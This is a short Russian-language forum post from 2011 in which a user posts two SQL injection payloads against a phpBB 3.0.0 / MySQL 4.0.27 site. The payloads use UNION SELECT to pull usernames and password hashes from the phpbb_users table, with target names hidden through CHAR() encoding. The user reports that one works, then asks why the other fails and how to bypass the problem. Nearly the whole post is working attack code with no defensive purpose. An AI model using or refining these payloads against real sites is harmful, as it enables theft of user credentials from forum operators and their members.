Показать сообщение отдельно

  #11  
Старый 25.04.2011, 18:11
guezd
Участник форума
Регистрация: 31.03.2011
Сообщений: 250
С нами: 7957046

Репутация: 81
По умолчанию

phpbb 3.0.0 MySQL 4.0.27 blind inj

Код:
ID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3A,username,user_password),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 from phpbb_users where username=CHAR(109, 97, 114, 97, 116)/*-
Результат показывает.

Код:
?ID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3A,username,user_password),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 from phpbb_users where username=CHAR(115, 99, 111, 114, 114, 121)/*-
Молчит. 2ой юзер в форуме есть. Из-за чего такое может быть и как это обойти?
 
Ответить с цитированием